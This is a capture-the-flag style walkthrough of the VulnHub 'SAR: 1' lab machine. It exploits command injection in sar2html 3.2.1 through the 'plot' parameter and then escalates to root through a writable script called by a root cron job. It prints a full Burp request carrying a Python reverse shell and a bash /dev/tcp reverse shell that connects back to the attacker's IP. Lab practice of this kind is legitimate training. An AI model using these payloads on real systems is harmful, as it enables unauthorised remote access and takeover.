Introduction

Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing.

This box is on the NetSecFocus Admin list of OSCP-like machines. It’s SAR: 1 from vulnhub.

Ports

HTTP on port 80 only. This already makes things easy because you know that you’ll be getting a webshell and not (for example) hunting for SSH creds.

HTTP

robots.txt has one entry: sar2HTML, so naturally we go straight there. It’s running sar2html Ver 3.2.1, which has an unauthenticated RCE vulnerability which I’ve seen before in the THM Boiler room, so I know what to do already.

sar2HTML

In web application you will see index.php?plot url extension.
http:///index.php?plot=; will execute the command you entered. After command injection press "select # host" then your command's output will appear bottom side of the scroll screen.

My preferred method with this is using Burp Suite:

GET /sar2HTML/index.php?plot=;python3+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("192.168.1.77",1234))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b' HTTP/1.1

Privsec

The box has been set up with a cron job to exploit for root. Every 5 minutes, root runs a script called finally.sh (which we can’t edit), which in turn calls write.sh (which we can edit). I found this via basic manual enumeration and saw what I had to do almost immediately, but somehow still struggled to get it to execute.

I made several mistakes, including trying to connect to a closed port on my Kali machine (I’ve recently installed ufw and not opened the second port I like to use for a listener), and mixing bash with sh commands. Anyway my final payload for write.sh was:

root@kali:/opt/vulnhub/sar# cat write.sh 
#!/bin/bash
/bin/bash -i >& /dev/tcp/192.168.1.77/1235 0>&1

And that worked fine and I was root and all was right with the world.